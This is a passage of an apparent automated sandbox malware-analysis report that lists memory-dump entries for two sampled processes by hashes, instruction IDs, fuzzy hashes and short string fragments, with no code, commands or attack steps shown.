                                                • Instruction Fuzzy Hash: CAF0893185E78C9FDB66AB6488695E97FB0FF56300F1605E7D488C60A2DA785544C701
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a1a7b1c34dbba332fac7796850ee04492eeb49b7bd58c5bb2fe7928cf37aa74
                                                • Instruction ID: 573b37380ed2e9e3ac7d44c162b41012cd91d7d6aac7682954edc2f9ccb6617e
                                                • Opcode Fuzzy Hash: 9a1a7b1c34dbba332fac7796850ee04492eeb49b7bd58c5bb2fe7928cf37aa74
                                                • Instruction Fuzzy Hash: 82F0303091990EDFEB50EF6898486ED77B4FB04305F01046AE81DD21A0DF70A2A48B01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2063cff8601adb8110055428e570a439ae37c37397095c4d81f03b4a57375fee
                                                • Instruction ID: 563e8faf76e57fcf0190e0486356c8b30caf5907851ee8b8cd2912d1d02f90d9
                                                • Opcode Fuzzy Hash: 2063cff8601adb8110055428e570a439ae37c37397095c4d81f03b4a57375fee
                                                • Instruction Fuzzy Hash: 2BF06530A1954D9FEB60EFA4941C6FD77E4FF44305F410576F81DC21A0DA74A650CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5ad500a4a90c3f03155a37616a7c1024a993df4cfa3aafd1116887fc770da25
                                                • Instruction ID: 62bb642ba80d0305c8d31a5df7dad647bfefc3ce736468b7f9329d5b9172668a
                                                • Opcode Fuzzy Hash: e5ad500a4a90c3f03155a37616a7c1024a993df4cfa3aafd1116887fc770da25
                                                • Instruction Fuzzy Hash: 9DF0303095950D9BEB61EFA484187FD77A4FF48304F010576E41DD21B1DA74A650CA01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f22e7a9a047fcce2d3cb5366a9f1473deab554e70e9d0ecb6cc303818fbc2f1
                                                • Instruction ID: d9957db44f97beab09ca8b0b36e50d5f38d476937ca985281787be4c94d2d518
                                                • Opcode Fuzzy Hash: 7f22e7a9a047fcce2d3cb5366a9f1473deab554e70e9d0ecb6cc303818fbc2f1
                                                • Instruction Fuzzy Hash: BBF06D3090550D8EDB21EB54C8246D8B7B1FBA5320F5543AAC42AD73F2DB796A418B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e7f0261ecd581cc12e1d45fe5ba06b179635a9cafc74725b0c38ac6357fc4574
                                                • Instruction ID: 04c287d9b7b1f43ecef77538c378c24951b2fd26238d9a26a295cbd3b10b3462
                                                • Opcode Fuzzy Hash: e7f0261ecd581cc12e1d45fe5ba06b179635a9cafc74725b0c38ac6357fc4574
                                                • Instruction Fuzzy Hash: E3F01C39E0550E8BDB28DF84C4606ECB771EB95321F05427AC41AE76A0CA787A51CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f73c748b86568444fd21dcae82e051d0038a7099d7cab5963d06a13863b6afd
                                                • Instruction ID: a834e3aac1a32ed891bc0a4fc08e9ba335c44f22224f141dccd756d9e2764e5b
                                                • Opcode Fuzzy Hash: 0f73c748b86568444fd21dcae82e051d0038a7099d7cab5963d06a13863b6afd
                                                • Instruction Fuzzy Hash: CBF0B471A0E2CD8FE735ABA444626E97B60EF55300F0601FAE04C874E3EE3966188742
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34dfc93cf4bd34fd046cfd87cdb126d4ce2ff5ac196c53b5ee281030a6233c1a
                                                • Instruction ID: 95e0072733b8e2d35e4cc3bda261b7f23e418c5261f8732dfe902bb3b7528789
                                                • Opcode Fuzzy Hash: 34dfc93cf4bd34fd046cfd87cdb126d4ce2ff5ac196c53b5ee281030a6233c1a
                                                • Instruction Fuzzy Hash: C9F0653091A50D9FEB51EFA4C4186FD77F4FF44304F414476E41DC22A0DA74A254CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 971b598117a7aa99f4d2dd14a45414145634d49659bbb997f5827418c21a1532
                                                • Instruction ID: c1356298111c2d0d324902c5aa1c6e17cd5e6df72294d4029bdbfe5236f917d2
                                                • Opcode Fuzzy Hash: 971b598117a7aa99f4d2dd14a45414145634d49659bbb997f5827418c21a1532
                                                • Instruction Fuzzy Hash: FAF06530D1A64D9FEB51EF6898986FDBBF0FF44704F0104BAE91CC21A5DA749694CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 61dceaf14431e6acf08b7a28266962f28228c7b59e6f4a30d52e92d984dcdc1b
                                                • Instruction ID: e82a040ccd8347e602a3400803671e0a505d674550630c63fefe649b1cb1bbc6
                                                • Opcode Fuzzy Hash: 61dceaf14431e6acf08b7a28266962f28228c7b59e6f4a30d52e92d984dcdc1b
                                                • Instruction Fuzzy Hash: 2FF05E30A0940A8FE764DB98D8A45FE76B1EB98315F914339E029D22E5DAB866408B44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31dc45aafdd661f3003dff3b832e8544de189061ee6c514a1945bf7766765706
                                                • Instruction ID: b4f4c05dad698499ca36409cf29b05e5faffe339cc19bc484b8e504d09121220
                                                • Opcode Fuzzy Hash: 31dc45aafdd661f3003dff3b832e8544de189061ee6c514a1945bf7766765706
                                                • Instruction Fuzzy Hash: 1CE06D30D2954D8FEB50FFA4D808AEDB7E4FF48304F0005BAF81CC21A0DA3466A48B01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f397855cb08193243ff826e47174e86fe9565d3c35041e5f8aa38206b695219f
                                                • Instruction ID: 45b52e89cad80d31760bf825c7149c180c7a6cfef96713a26ef4dbd4a57eca0f
                                                • Opcode Fuzzy Hash: f397855cb08193243ff826e47174e86fe9565d3c35041e5f8aa38206b695219f
                                                • Instruction Fuzzy Hash: F4E06D3096A94DAFEB50EFA49818BED7BE4FF48304F41057AE85DC21A0DA706690CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18550ec7988e02ba9a818922b6b7cc9b11da36ea2a896833ff33b71f35de6b7d
                                                • Instruction ID: 0ea0c7084f902d05befc44b8d26a3f25454b9f894f25119abe21a0ddc63b4f50
                                                • Opcode Fuzzy Hash: 18550ec7988e02ba9a818922b6b7cc9b11da36ea2a896833ff33b71f35de6b7d
                                                • Instruction Fuzzy Hash: 22E0D87191FA4D8BDB25AF64D9311E93394FF85304F064325F56C831E2EA746624C645
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 802370150154214a6229de86aa20f243a6127de3a39c1f03b5b9e74245a89a5c
                                                • Instruction ID: 3e2bf1c68ac3db6dd389b7706e5266f0fbdb795fcdd153df04691432e27c72cf
                                                • Opcode Fuzzy Hash: 802370150154214a6229de86aa20f243a6127de3a39c1f03b5b9e74245a89a5c
                                                • Instruction Fuzzy Hash: 00F0E531F4E28D8FE721AB68886D6EC7FA0FF41B14F0511F6E40C860E6DE3896848702
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 254f4897226479a8cbf66c7d56742a39fc87cf402ccb2b5bbf786a87bd008440
                                                • Instruction ID: 61e0c40d89e64b59b2caf6ffd5e1d7d07ed28bb0764126261858390ca64587e8
                                                • Opcode Fuzzy Hash: 254f4897226479a8cbf66c7d56742a39fc87cf402ccb2b5bbf786a87bd008440
                                                • Instruction Fuzzy Hash: 7BF01C34A1951D8BDB29DB44C8606ED73A2FB95310F150269C00AA73A1CBB86E50CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 800baf27dd92a945bfc4ac5fc42c0a477bacdf68df2d371b6952323b50678fb8
                                                • Instruction ID: 20474c786e71a1978b1120edb0d46013f8195dd1c7fd35b4f6139eb44b7039a9
                                                • Opcode Fuzzy Hash: 800baf27dd92a945bfc4ac5fc42c0a477bacdf68df2d371b6952323b50678fb8
                                                • Instruction Fuzzy Hash: 05E04F34D5A50EAAEB61FBB984586FDB7E4FF08304F0109B6E40DC20A1DA747294CB01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1bb0661bbeb90c7a86a76753111d400d3ff2a43c15de1009e91521705c82781b
                                                • Instruction ID: 6eb804f6497018803a0331c54893cdb99027ce889da1c6f6bcf4c535b3ec26d3
                                                • Opcode Fuzzy Hash: 1bb0661bbeb90c7a86a76753111d400d3ff2a43c15de1009e91521705c82781b
                                                • Instruction Fuzzy Hash: 2FE09A30A1A10E8FEB60EF989A202ED73A0FF00304F110935E41C820A0DA74AB24DB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f2894c8ce32bb2d624bfb09bf8412c2014dc9fafdeca88ae1257b2d020c47ff
                                                • Instruction ID: d738d5212ba288c57219b1a01d8294cee66cc8ccf7d322ec31cf84164f1b3675
                                                • Opcode Fuzzy Hash: 2f2894c8ce32bb2d624bfb09bf8412c2014dc9fafdeca88ae1257b2d020c47ff
                                                • Instruction Fuzzy Hash: 92E04F30D5AA0D9AEB60BBA4855C6FDB7E4EF88304F014976E41DC20A1DA74A2948B01
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4897afbec25a02ca525b4177b98bdbc4f75e08771029642557ab74f721606d13
                                                • Instruction ID: ffdb275319cb62e46e1d2a24aa6e9bba0ce20b18553afda1b3573a3785a895a8
                                                • Opcode Fuzzy Hash: 4897afbec25a02ca525b4177b98bdbc4f75e08771029642557ab74f721606d13
                                                • Instruction Fuzzy Hash: AFE08630D5A10EAEEB20EF9897156FD72A4FF40314F504972F45D810E1DA787B549661
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9558bc47a7c491af3d396442e10061ada28c399a4d5a1ea56a83853ad60cf799
                                                • Instruction ID: e1a312bbf523bfec53617d81aaafb6dc511dbe708f0cfe86306fd89df02ba760
                                                • Opcode Fuzzy Hash: 9558bc47a7c491af3d396442e10061ada28c399a4d5a1ea56a83853ad60cf799
                                                • Instruction Fuzzy Hash: 30E08630F5A40E9AEB20AB988418AFD73A4FF40B04F0015B1F41D910D5CE3463948701
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 417c1dbe2748f0d92756dd07f2b3a5534d307ba58eee163b95f3edb267e50caf
                                                • Instruction ID: 737ead4b838bb0d153858c26816261179cbb682871c6bcf71fc0f65a6c5d8b3f
                                                • Opcode Fuzzy Hash: 417c1dbe2748f0d92756dd07f2b3a5534d307ba58eee163b95f3edb267e50caf
                                                • Instruction Fuzzy Hash: 46E04F31A4F34E87EB38AFA499251E97A60FFC5604F05067DE46C020D5DEB9A6648682
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 85eee706d8037022aa1caa6fb076ade38eb81d6ec500adf1491591859c10c212
                                                • Instruction ID: 4432eacc5947832a2bbe8bc26d18d5145d20827e0b65c166c4cc6879a890e753
                                                • Opcode Fuzzy Hash: 85eee706d8037022aa1caa6fb076ade38eb81d6ec500adf1491591859c10c212
                                                • Instruction Fuzzy Hash: 97C04CB4E0D51DCEDB64DB9484552FDB6F4FB68301F511139C00DD2252DA645941C740
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !$A$\$`$h
                                                • API String ID: 0-1478168128
                                                • Opcode ID: 4a0d73a7d6f5018768a3010c4800bf01dbca4e0d34660d421b4a0f2a6fb7b29f
                                                • Instruction ID: d1d70393bcd3d8360887cda117a72d48d0b0261458b39a011bbbafb14c83b06f
                                                • Opcode Fuzzy Hash: 4a0d73a7d6f5018768a3010c4800bf01dbca4e0d34660d421b4a0f2a6fb7b29f
                                                • Instruction Fuzzy Hash: 7851C370E1926D8FEB64DF54C8647ADB6B1BF89301F4002E9D04DA63A1DBB85A81CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: =$F$W$]$u
                                                • API String ID: 0-4012747424
                                                • Opcode ID: 2146004ce3636a4efdd83a299e2fc03f105f7a4ac007456bb4eea9aef8593191
                                                • Instruction ID: f47aff795ef5874740dd770c8e6b2f4dfce0b965eeea44cd27af9769c73486aa
                                                • Opcode Fuzzy Hash: 2146004ce3636a4efdd83a299e2fc03f105f7a4ac007456bb4eea9aef8593191
                                                • Instruction Fuzzy Hash: EF41E770E0966D8FDBA8DF54C8A4BADB7B1EB54300F5042AAD40EA72A0DB745E81CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1743544878.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ffd9bad0000_hui.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: '$($S$b${
                                                • API String ID: 0-809860253
                                                • Opcode ID: 82a6d64982bd1d2a82e8e3989d6e9140079cbb9cdcf35a40c261279543a10cad
                                                • Instruction ID: 2016728ac61a6c529085a137a4c11da9024ce2c80d39c03969c58daeaf27de77
                                                • Opcode Fuzzy Hash: 82a6d64982bd1d2a82e8e3989d6e9140079cbb9cdcf35a40c261279543a10cad
                                                • Instruction Fuzzy Hash: DC41B670E0966E8FDB68DF54C8A4BADB3B1FB54301F5102F9D00DA62A1CBB46B818F41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1817953110.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffd9bac0000_KQihinlofznONtA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e47f8371f19db726ab849c70c63af912ecbd77680c915a2fe1b84a8977be808
                                                • Instruction ID: 9c6d2ce6878e3773f40c3a6ff103f6fe554781744b7ee92318f2ee5779ac7f16
                                                • Opcode Fuzzy Hash: 0e47f8371f19db726ab849c70c63af912ecbd77680c915a2fe1b84a8977be808
                                                • Instruction Fuzzy Hash: 315211A284E7C55FD7138B749C755A13FB0AF27214B0E49DBC4C0CF4A3E2189A5AD762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1817953110.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffd9bac0000_KQihinlofznONtA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Z${
                                                • API String ID: 0-2824158054
                                                • Opcode ID: 19f83079a5d0a9581feccc3c35ab51dbed3ac6f8f07180bc7d502e4a1a444426
                                                • Instruction ID: 4c2527c4dfaecd75ace0ea1e060d3fd3e43853818d2d5394f82abe67d69276a8
                                                • Opcode Fuzzy Hash: 19f83079a5d0a9581feccc3c35ab51dbed3ac6f8f07180bc7d502e4a1a444426
                                                • Instruction Fuzzy Hash: 8C01D2B0E0922D8EEB74EF54C8643FDB6B1BB08304F4141A9D04DA3291CBB85A849F84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1817953110.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffd9bac0000_KQihinlofznONtA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %
                                                • API String ID: 0-2567322570
                                                • Opcode ID: 69a9b748edab463bc7868f72fa8bb2fd08b52432184b6e78d09b84db5850dab5
                                                • Instruction ID: c8f0a2dbbb812228d7fd842f53d4b6fba032c11f95bb7e3fc019ce925914ccaa
                                                • Opcode Fuzzy Hash: 69a9b748edab463bc7868f72fa8bb2fd08b52432184b6e78d09b84db5850dab5
                                                • Instruction Fuzzy Hash: ECF03074E1A22E8FD739AB54C5A07F87261AF59305F1180F9C00E57696CA796A81CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1817953110.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffd9bac0000_KQihinlofznONtA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60f9d64fc7087566beaa784b3ce3b8e3dea9e98c5afc99407803639e47b20788
                                                • Instruction ID: d31ed9a830a854d77eac398eae349444691395ed805bd08b130d4c72c29d8383
                                                • Opcode Fuzzy Hash: 60f9d64fc7087566beaa784b3ce3b8e3dea9e98c5afc99407803639e47b20788
                                                • Instruction Fuzzy Hash: B8D13A71E19A5D8FDBA8EF98C8A4BBCB7A1FF58304F4441B9D00D972E6DA346940CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1817953110.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffd9bac0000_KQihinlofznONtA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aaa3357d2d55285d5e6aa6d9b8760ad00df74205d5a7f830c58276f9b6b413c6
                                                • Instruction ID: 6ea551cdb7b41988d4aba5e804151f19749a91a34367c62a70a8a59f37a0fac1
                                                • Opcode Fuzzy Hash: aaa3357d2d55285d5e6aa6d9b8760ad00df74205d5a7f830c58276f9b6b413c6
                                                • Instruction Fuzzy Hash: D16189A244E7C54FD7138B749CA69913FB0AF27214B0A05DBD4C4CF4A3E2689A5AC762
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1817953110.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffd9bac0000_KQihinlofznONtA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ec0fea653725cb356ce607d0e140b172baf062a7c6d224574abe6ec0af85129
                                                • Instruction ID: 4f60efe7a3269dee12f9b5866320456a69b4e6c282e0ef036a2cd65422e3d67d
                                                • Opcode Fuzzy Hash: 4ec0fea653725cb356ce607d0e140b172baf062a7c6d224574abe6ec0af85129
                                                • Instruction Fuzzy Hash: 50512A71A1A91D8FDFA4EB98D8A5ABCB7F1FB58310F00016AD00DE3296DB6569458B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1817953110.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffd9bac0000_KQihinlofznONtA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5197bb5bc1be33f8cbbf75cb478b195912b84975b20eb8deec2045b28638cfb2
                                                • Instruction ID: 5eeb380722fe7b6ced7e75a72476de7c948a44666a13f2d732ba440eda2454d8
                                                • Opcode Fuzzy Hash: 5197bb5bc1be33f8cbbf75cb478b195912b84975b20eb8deec2045b28638cfb2
                                                • Instruction Fuzzy Hash: 99512870E0AA0D8FEBA9EF99C4696FDB7B1EF59300F51017AD00AE3291DE7469418B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1817953110.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffd9bac0000_KQihinlofznONtA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d56af781e88a916c5619f451baf9b22edb01fbab37108158fa5e0a623816b5c
                                                • Instruction ID: 83b48a43a4813e354c1b959540647971712f89d16516ac11e3de5230555ca5b2
                                                • Opcode Fuzzy Hash: 7d56af781e88a916c5619f451baf9b22edb01fbab37108158fa5e0a623816b5c
                                                • Instruction Fuzzy Hash: F441C236F0D51E4AEB24AF98EC626FE77A0EF41365F01013BD109972D5CA686E09CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1817953110.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffd9bac0000_KQihinlofznONtA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 204626738427600ac6ebd8a2be1cf164d61b19a4e29d8807226c356fdb607ef7
                                                • Instruction ID: d78bcaf27e6de081cf701df4250b3c265783dd1b32f05ff23ff69c024e3ce6ad
